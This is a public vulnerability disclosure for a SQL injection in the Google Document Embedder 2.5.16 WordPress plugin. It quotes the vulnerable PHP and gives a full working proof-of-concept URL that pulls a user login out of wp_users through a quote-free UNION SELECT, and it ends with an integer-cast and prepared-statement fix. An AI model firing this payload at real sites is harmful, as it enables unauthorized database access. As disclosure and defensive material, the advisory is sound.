Exploit Title : Google Document Embedder 2.5.16 mysql_real_escape_string bypass SQL Injection
Date : 2014-12-03
Exploit Author : Securely (Yoo Hee man)
Plugin : google-document-embedder
Fixed version : N/A
Software Link : https://downloads.wordpress.org/plugin/google-document-embedder.2.5.16.zip

1. Detail
- Google Document Embedder v2.5.14 has an SQL Injection in the gpid parameter.
- v2.5.16 attempted to patch it by passing gpid through mysql_real_escape_string().
- That patch is ineffective and can be bypassed: mysql_real_escape_string() only escapes quote and backslash characters, but $gpid is interpolated unquoted into a numeric comparison (WHERE profile_id = $id), so any payload that contains no quote characters (for example one that builds its strings with CHAR()/CAST(), as in the PoC below) passes through the escaping unchanged.
- Vulnerable file : /google-document-embedder/~view.php
================================================================
50 // get profile
51 if ( isset( $_GET['gpid'] ) ) {
52 $gpid = mysql_real_escape_string( $_GET['gpid'] ); //mysql_real_escape_string() is bypass
53 if ( $profile = gde_get_profile( $gpid ) ) {
54 $tb = $profile['tb_flags'];
55 $vw = $profile['vw_flags'];
56 $bg = $profile['vw_bgcolor'];
57 $css = $profile['vw_css'];
58 }
59 }
================================================================
===============================================================
373 function gde_get_profile( $id ) {
374 global $wpdb;
375 $table = $wpdb->prefix . 'gde_profiles';
376
377 $profile = $wpdb->get_results( "SELECT * FROM $table WHERE profile_id = $id", ARRAY_A );
378 $profile = unserialize($profile[0]['profile_data']);
379
380 if ( is_array($profile) ) {
381 return $profile;
382 } else {
383 return false;
384 }
385 }
================================================================
- Note that gde_get_profile() passes the first row's profile_data straight to unserialize() and only returns it if the result is an array. The PoC's UNION SELECT therefore constructs a serialized PHP array, a:1:{s:6:"vw_css";s:<length>:"<user_login>";} (the CHAR() calls spell out the serialization syntax so no quote characters are needed), so that is_array() succeeds and the extracted user_login ends up in the profile's vw_css value, which ~view.php reads into $css (line 57) and presumably emits to the viewer page.

2. POC
http://target/wp-content/plugins/google-document-embedder/~view.php?embedded=1&gpid=0%20UNION%20SELECT%201,%202,%203,%20CONCAT(CAST(CHAR(97,%2058,%2049,%2058,%20123,%20115,%2058,%2054,%2058,%2034,%20118,%20119,%2095,%2099,%20115,%20115,%2034,%2059,%20115,%2058)%20as%20CHAR),%20LENGTH(user_login),%20CAST(CHAR(58,%2034)%20as%20CHAR),%20user_login,%20CAST(CHAR(34,%2059,%20125)%20as%20CHAR))%20FROM%20wp_users%20WHERE%20ID=1
(The PoC assumes the default wp_ table prefix for the users table and reads the login of the user with ID 1; gpid=0 is chosen so that, presumably, no real profile matches and the UNION row becomes row 0 of the result.)

3. Solution: Not patched by the vendor at the time of writing. Escaping is the wrong tool for an integer value; the fix is to treat gpid as an integer, e.g. `$gpid = (int) $_GET['gpid'];` in ~view.php and `$wpdb->get_results( $wpdb->prepare( "SELECT * FROM $table WHERE profile_id = %d", $id ), ARRAY_A )` in gde_get_profile(). Until then, blocking requests whose gpid is not purely numeric at the web server or WAF mitigates the issue.

4.
Discovered By : Securely (Yoo Hee man) God2zuzu@naver.com